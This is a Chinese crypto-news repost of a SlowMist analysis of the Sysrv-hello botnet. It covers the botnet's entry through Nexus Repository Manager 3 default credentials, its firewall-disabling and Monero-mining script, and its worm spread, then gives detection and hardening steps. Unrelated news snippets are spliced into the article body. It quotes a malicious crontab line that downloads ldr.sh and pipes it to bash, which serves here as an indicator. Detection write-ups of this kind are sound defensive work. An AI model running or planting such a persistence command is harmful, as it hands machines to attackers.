比特幣交易所 比特幣交易所
Ctrl+D 比特幣交易所
ads

慢霧:技術拆解 Sysrv-hello 僵尸網絡入侵原理_ELEC

Author:

Time:1900/1/1 0:00:00

攻擊路徑

Sysrv-hello僵尸網絡對云上NexusRepositoryManager3存在默認帳號密碼的服務器進行攻擊,Maven私服部署會用到NexusRepositoryManager3,由于Maven是個流行服務,所以也給了Sysrv-hello僵尸網絡的大范圍感染機會。

當NexusRepositoryManager3服務對外網開放且存在默認賬號密碼時,Sysrv-hello就可以直接掃描入侵,利用NexusRepositoryManager3的Tasks功能模塊直接運行惡意腳本達到入侵服務器的目的。

慢霧:已凍結部分BitKeep黑客轉移資金:12月26日消息,慢霧安全團隊在社交媒體上發文表示,正在對 BitKeep 錢包進行深入調查,并已凍結部分黑客轉移資金。[2022/12/26 22:08:58]

入侵到服務器后會自動下載執行ldr.sh文件,該文件主要功能:1.禁用Linux服務器防火墻(ufw)及清空iptables2.刪除aliyun、yunjing等主機安全軟件3.禁用apparmor、selinux、watchdog等安全機制4.刪除其他競品5.下載門羅幣挖礦程序進行挖礦,文件與進程名為network016.下載第二個木馬sysrv進行更高級操作7.在crontab里加上尾巴

慢霧:Lendf.Me攻擊者剛歸還了126,014枚PAX:慢霧安全團隊從鏈上數據監測到,Lendf.Me攻擊者(0xa9bf70a420d364e923c74448d9d817d3f2a77822)剛向Lendf.Me平臺admin賬戶(0xa6a6783828ab3e4a9db54302bc01c4ca73f17efb)轉賬126,014枚PAX,并附言\"Better future\"。隨后Lendf.Me平臺admin賬戶通過memo回復攻擊者并帶上聯系郵箱。此外,Lendf.Me攻擊者錢包地址收到一些受害用戶通過memo求助。[2020/4/20]

第二個木馬sysrv的主要功能:1.確保門羅幣挖礦程序network01正常運行2.進行蠕蟲傳播,隨機掃描其他IP服務,同樣進行NexusRepositoryManager3漏洞利用,同時也會嘗試入侵MySQL、Tomcat、WebLogic等服務

動態 | 慢霧:Electrum“更新釣魚”盜幣攻擊補充預警:Electrum 是全球知名的比特幣輕錢包,支持多簽,歷史悠久,具有非常廣泛的用戶群體,許多用戶喜歡用 Electrum 做比特幣甚至 USDT(Omni) 的冷錢包或多簽錢包。基于這種使用場景,Electrum 在用戶電腦上使用頻率會比較低。Electrum 當前最新版本是 3.3.8,而已知的 3.3.4 之前的版本都存在“消息缺陷”,這個缺陷允許攻擊者通過惡意的 ElectrumX 服務器發送“更新提示”。這個“更新提示”對于用戶來說非常具有迷惑性,如果按提示下載所謂的新版本 Electrum,就可能中招。據用戶反饋,因為這種攻擊,被盜的比特幣在四位數以上。本次捕獲的盜幣攻擊不是盜取私鑰(一般來說 Electrum 的私鑰都是雙因素加密存儲的),而是在用戶發起轉賬時,替換了轉賬目標地址。在此我們提醒用戶,轉賬時,需要特別注意目標地址是否被替換,這是近期非常流行的盜幣方式。并建議用戶使用 Ledger 等硬件錢包,如果搭配 Electrum,雖然私鑰不會有什么安全問題,但同樣需要警惕目標地址被替換的情況。[2020/1/19]

自查方法

進程:network01sysrv

文件:/tmp/network01/tmp/sysrv/tmp/flag.txt

crontab:echo"*/9****(curl-fsSL$cc/ldr.sh||wget-q-O-$cc/ldr.sh)|bash>/dev/null2>&1"|crontab-

端口:52013

存在以上這些,停止備份樣本后刪除。

加固建議

刪除NexusRepositoryManager3Tasks里的惡意代碼NexusRepositoryManager3嚴禁外網訪問,嚴禁默認賬號密碼NexusRepositoryManager3升級為最新版本被入侵服務器備份重要數據后,重配置或重做檢查被入侵服務器是否存在直接訪問生產網其他服務的能力,存在則在生產網其他服務所在的服務器上進一步分析是否有異常免責聲明:作為區塊鏈信息平臺,本站所發布文章僅代表作者個人觀點,與鏈聞ChainNews立場無關。文章內的信息、意見等均僅供參考,并非作為或被視為實際投資建議。

本文來源于非小號媒體平臺:

慢霧科技

現已在非小號資訊平臺發布68篇作品,

非小號開放平臺歡迎幣圈作者入駐

入駐指南:

/apply_guide/

本文網址:

/news/9606255.html

免責聲明:

1.資訊內容不構成投資建議,投資者應獨立決策并自行承擔風險

2.本文版權歸屬原作所有,僅代表作者本人觀點,不代表非小號的觀點或立場

上一篇:

深入解析MakeDao在新周期里的機遇和風險

Tags:CTRELEGERELECXActRewardsElementremGEROElectrify.Asia

酷幣下載
Hotbit 定于2021年2月1日上線 PHO (Phoswap)_HOT

尊敬的用戶: Hotbit即將在開啟PHO(Phoswap)數字資產服務。 具體安排如下: 充值時間:2021年02月01日15:00(香港時間)交易時間:2021年02月01日17:00(香港.

1900/1/1 0:00:00
天門市核心要點_ALA

請廣大市民密切關注國際國內疫情形勢,非必要不出行,減少外出流動。在天門的外地籍人員,特別是機關干部、企事業單位干部職工及在校學生,建議就地過節;在境外或國內中高風險地區的天門籍人員,提倡在當地過.

1900/1/1 0:00:00
Gate.io 幣王BTC沖天破$30,000,驚喜雙彩蛋 紅包雨狂嗨三天活動結果及獎勵公告_Gate.io

Gate.io幣王BTC沖天破$30,000,驚喜雙彩蛋紅包雨狂嗨三天活動已圓滿結束,感謝大家的熱情參與.

1900/1/1 0:00:00
朔州市核心要點_以太坊

非必要不出行,必要的出行必須做到“外出必報備、返回必報告。春節農村返鄉人員需持7天內有效新冠病核酸檢測陰性結果,返鄉后實行14天居家健康監測,期間不聚集、不流動,每7天開展一次核酸檢測.

1900/1/1 0:00:00
1.23 比特幣行情走勢分析_BTC

行情觀點:大餅探底跌破30000一線關口,觸底回升收回跌幅,小時級別來看,昨日早盤大餅跌破30000一線關口,觸底28800一線反彈,震蕩上行,凌晨4時插針突破上軌壓制.

1900/1/1 0:00:00
Gate.io 已經完成KAI(KardiaChain)主網升級并支持為ERC20代幣兌換主網幣服務_GATE

Gate.io已經完成了KAI的主網升級,目前同時支持主網幣和ERC20代幣。當前我們支持為用戶兌換ERC20代幣到主網代幣。平臺內的用戶無需任何操作.

1900/1/1 0:00:00
ads